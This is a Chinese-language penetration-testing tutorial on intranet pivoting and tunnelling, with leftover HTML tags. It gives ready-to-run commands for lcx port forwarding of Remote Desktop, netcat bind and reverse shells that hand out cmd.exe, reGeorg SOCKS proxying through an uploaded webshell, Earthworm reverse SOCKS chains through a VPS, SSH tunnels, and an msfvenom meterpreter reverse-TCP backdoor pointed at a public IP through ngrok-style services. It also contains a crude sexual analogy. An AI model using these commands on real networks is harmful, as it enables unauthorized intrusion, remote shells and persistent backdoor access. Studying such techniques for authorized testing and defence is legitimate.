内网端口转发及穿透技术详解<\/h1>

0x01 正向代理与反向代理<\/h2>

正向代理 (Forward Proxy)<\/h3>

结构<\/strong>：Lhost → proxy → Rhost<\/li>

特点<\/strong>：

proxy和client同属一个LAN<\/li>
对server透明<\/li>
proxy代替client访问Rhost<\/li> <\/ul> <\/li>
应用场景<\/strong>：客户端需要通过代理访问外部资源<\/li> <\/ul>
反向代理 (Reverse Proxy)<\/h3>

结构<\/strong>：Lhost ↔ proxy ↔ firewall ↔ Rhost<\/li>
特点<\/strong>：

proxy和server同属一个LAN<\/li>
对client透明<\/li>
proxy决定将请求转发到哪个后端服务器<\/li> <\/ul> <\/li>
应用场景<\/strong>：负载均衡、穿透防火墙<\/li> <\/ul>
形象区分<\/strong>：<\/p>

正向代理：客户端戴套(proxy)插进去<\/li>
反向代理：服务端(Rhost)通过上位(proxy)坐上来<\/li> <\/ul>
0x02 lcx端口转发<\/h2>
实验环境<\/h3>

内网IP：192.168.153.138<\/li>
公网IP：192.168.153.140<\/li> <\/ul>
操作步骤<\/h3>

内网机器执行：<\/p>
lcx.exe -slave 192.168.153.140 4444 192.168.153.138 3389 <\/code><\/pre> 将内网3389端口转发到公网4444端口<\/p> <\/li> 公网机器执行：<\/p> lcx -listen 4444 5555 <\/code><\/pre> 监听4444端口并将请求转发到5555端口<\/p> <\/li> 连接：通过127.0.0.1:5555访问内网远程桌面<\/p> <\/li> <\/ol> 0x03 nc反弹<\/h2> 正向连接<\/h3> 内网执行： nc -l -p 5555 -t -e cmd.exe <\/code><\/pre> <\/li> 公网执行： nc -nvv 192.168.153.138 5555 <\/code><\/pre> <\/li> <\/ol> 反向连接<\/h3> 公网监听： nc -lp 5555 <\/code><\/pre> <\/li> 内网反弹： nc -t -e cmd 192.168.153.140 5555 <\/code><\/pre> <\/li> <\/ol> 0x04 SOCKS代理工具<\/h2> 1. Earthworm\/Termite<\/h3> 功能：SOCKS v5服务架设和端口转发<\/li> 支持：Linux\/Windows\/MacOS\/Arm-Linux<\/li> 最新版：Termite<\/li> <\/ul> 2. reGeorg<\/h3> 原理：通过webshell建立SOCKS代理<\/li> 要求：服务器支持aspx\/php\/jsp<\/li> 使用： python reGeorgSocksProxy.py -p 1080 -u http:\/\/192.168.153.137\/tunnel.jsp <\/code><\/pre> <\/li> <\/ul> 3. sSocks<\/h3> 特点：支持SOCKS5验证、IPV6和UDP<\/li> 提供反向SOCKS代理服务<\/li> <\/ul> 4. SocksCap64<\/h3> 功能：Windows全局代理软件<\/li> 优点：使不支持SOCKS的应用程序也能代理<\/li> <\/ul> 5. Proxychains<\/h3> 功能：Linux全局代理<\/li> 配置：支持多个代理链<\/li> 限制：不支持UDP和ICMP<\/li> <\/ul> 0x04.1 reGeorg+Proxychains组合<\/h2> 上传tunnel.jsp到服务器<\/li> 本地执行： python reGeorgSocksProxy.py -p 1080 -u http:\/\/192.168.153.137\/tunnel.jsp <\/code><\/pre> <\/li> 配置proxychains： socks5 127.0.0.1 1080 <\/code><\/pre> <\/li> 使用nmap扫描： proxychains nmap -sT -Pn 目标IP <\/code><\/pre> <\/li> <\/ol> 0x04.2 Earthworm穿透技术<\/h2> 六种链路状态<\/h3> ssocksd：正向SOCKS代理<\/li> rcsocks：反向SOCKS代理服务端<\/li> rssocks：反向SOCKS代理客户端<\/li> lcx_slave：连接代理请求方和提供方<\/li> lcx_tran：监听本地端口并转发<\/li> lcx_listen：监听本地端口并转交<\/li> <\/ol> 0x04.2.1 正向SOCKS5服务器<\/h3> ew_for_Win.exe -s ssocksd -l 8888 <\/code><\/pre> 其他主机设置代理为192.168.153.140:8888<\/p> 0x04.2.2 反弹SOCKS5服务器<\/h3> 公网VPS执行： .\/ew_for_linux64 -s rcsocks -l 1080 -e 8888 <\/code><\/pre> <\/li> 目标主机执行： ew_for_Win.exe -s rssocks -d 192.168.153.129 -e 8888 <\/code><\/pre> <\/li> 本地通过VPS的1080端口访问内网<\/li> <\/ol> 0x04.2.3 二级网络环境(一)<\/h3> B主机执行： ew_for_Win.exe -s ssocksd -l 8888 <\/code><\/pre> <\/li> A主机执行： ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888 <\/code><\/pre> <\/li> 通过A的外网IP:1080访问B<\/li> <\/ol> 0x04.2.4 二级网络环境(二)<\/h3> 公网VPS执行： .\/ew_for_linux64 -s lcx_listen -l 10800 -e 8888 <\/code><\/pre> <\/li> B主机执行： ew_for_Win.exe -s ssocksd -l 9999 <\/code><\/pre> <\/li> A主机执行： ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999 <\/code><\/pre> <\/li> 通过VPS的10800端口访问内网<\/li> <\/ol> 0x05 SSH隧道代理转发<\/h2> 三种转发方式<\/h3> 本地转发(-L)<\/li> 远程转发(-R)<\/li> 动态转发(-D)<\/li> <\/ol> 常用参数<\/h3> -q：安静模式<\/li> -T：不占用shell<\/li> -f：后台运行<\/li> -N：不执行远程命令<\/li> <\/ul> 0x05.1 SSH本地转发<\/h3> ssh -CfNg -L 1234:127.0.0.1:3306 root@45.32.31.121 <\/code><\/pre> 将远程3306转发到本地1234端口<\/p> 0x05.2 SSH远程转发<\/h3> ssh -CfNg -R 81:127.0.0.1:80 root@192.168.153.142 <\/code><\/pre> 将内网80端口转发到外网81端口<\/p> 0x05.3 SSH动态转发(SOCKS代理)<\/h3> ssh -qTfnN -D 1080 root@45.32.31.121 <\/code><\/pre> 创建SOCKS代理隧道<\/p> 0x06 内网穿透平台<\/h2> 常见平台<\/h3> ngrok：https:\/\/www.ngrok.cc\/<\/li> natapp：https:\/\/natapp.cn\/<\/li> <\/ul> 使用示例<\/h3> 注册并开通隧道<\/li> 下载客户端<\/li> 生成后门： msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=47.90.92.56 LPORT=52524 -f exe > shell.exe <\/code><\/pre> <\/li> 本地监听<\/li> <\/ol> 总结<\/h2> 本文详细介绍了内网穿透的各种技术手段，包括正向\/反向代理、lcx端口转发、nc反弹、SOCKS代理工具(Earthworm\/reGeorg\/sSocks等)、SSH隧道转发以及商业内网穿透平台。掌握这些技术可以帮助安全测试人员在复杂网络环境下完成渗透测试任务。<\/p>